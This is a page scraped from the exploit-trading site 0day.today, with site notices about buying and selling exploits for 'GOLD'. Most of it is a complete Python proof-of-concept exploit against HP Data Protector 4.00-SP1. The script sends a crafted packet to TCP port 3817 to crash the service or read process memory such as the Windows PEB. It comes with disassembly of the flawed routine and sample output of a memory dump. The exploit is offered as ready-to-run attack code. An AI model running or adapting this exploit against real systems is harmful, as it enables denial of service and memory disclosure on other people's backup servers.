0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit
=============================================================== HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit =============================================================== #!/usr/bin/env python #POC Memory disclosure/ Denial Of Service #HP Data protector 4.00-sp1 43064 #Tested for Windows Version Only ''' Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80 100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754] 100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598] 100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data 100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset 100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak 100DDEA3 83C4 1C ADD ESP,1C 100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI ''' import socket import sys import struct import time import getopt bf = ("\x54\x84\x00\x00" + "\x00\x00\x00\x00" + "\x06\x00\x00\x00" + "\x92\x00\x00\x00" + "data") ip = '192.168.0.14' port = 3817 addr = (ip,port) mem_addr = 0x7ffdf000 #PEB for windows DEBUG = False def exploit_memory(ip_addr,read_mem): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip_addr,port)) reqst = bf.replace("data","A"*130) #t = ((addr-1022AC80)/4 - 4) t = ((read_mem-0x1022A4F0)/4 - 4) print "0x%x" % t reqst = reqst[0:32] + struct.pack("<L",t) + reqst[36:] s.send(reqst) resp = s.recv(1000) leak = struct.unpack("<L",resp[32:36]) #print type(leak[0]) if DEBUG: print "Len of resp: %d" % len(resp) for i in range(0,len(resp)): if i % 16 ==0: print print "0x%02x" % struct.unpack("<B",resp[i]), print s.close() return leak[0] def dos_yosemite(ip_addr): print "[*] Sending DOS Exploit." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip_addr,port)) reqst = bf.replace("data","A"*130) s.send(reqst) #resp = s.recv(1000) s.close() def main(): try: opt, args = getopt.getopt(sys.argv[1:],"ht:e:",["help","target=","exploit="]) if len(opt)==0: usage() sys.exit(0) except getopt.GetoptError,err: print str(err) usage() sys.exit(2) for o,a in opt: if o in ("-h","--help"): usage() sys.exit() elif o in ("-e","--exploit"): for opt_target,arg_target in opt: if opt_target in ("-t","--target"): if int(a) == 0: # DoS dos_yosemite(arg_target) sys.exit(0) elif int(a) == 1: print "[*] Dumping Memory..{PEB}" for i in range(0,int(0x50),4): #Poc to read the 80bytes from memory leak = exploit_memory(arg_target,mem_addr+i) time.sleep(0.5) print "0x%08x ---> 0x%08x" % ((mem_addr+i),leak) sys.exit() else: print "[*] Unknown Exploit type" usage() sys.exit() else: print "[*] Target Missing" usage() sys.exit() else: continue def usage(): print "Yosemite DoS and Information Disclosure Exploit" #print "Yosemite backup standard v8.7 build 43905 Trial" #print "Tested for Windows Versions" print "Available Options" print "\t -t | --target target address" print "\t -e | --exploit { 0 - Dos \ 1 - Memory Leak }" print "\n" if __name__=='__main__': main() ''' C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1 [*] Dumping Memory..{PEB} 0x7ffdf000 ---> 0x0012fbc4 0x7ffdf004 ---> 0x00130000 0x7ffdf008 ---> 0x0012d000 0x7ffdf00c ---> 0x00000000 0x7ffdf010 ---> 0x00001e00 0x7ffdf014 ---> 0x00000000 0x7ffdf018 ---> 0x7ffdf000 0x7ffdf01c ---> 0x00000000 0x7ffdf020 ---> 0x00000c54 0x7ffdf024 ---> 0x00000cfc 0x7ffdf028 ---> 0x00000000 0x7ffdf02c ---> 0x00000000 0x7ffdf030 ---> 0x7ffdb000 0x7ffdf034 ---> 0x00000000 0x7ffdf038 ---> 0x00000000 0x7ffdf03c ---> 0x00000000 0x7ffdf040 ---> 0xe15b42a0 0x7ffdf044 ---> 0x00000000 0x7ffdf048 ---> 0x00000000 0x7ffdf04c ---> 0x00000000 C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0 [*] Sending DOS Exploit. ''' # 0day.today [2024-12-24] #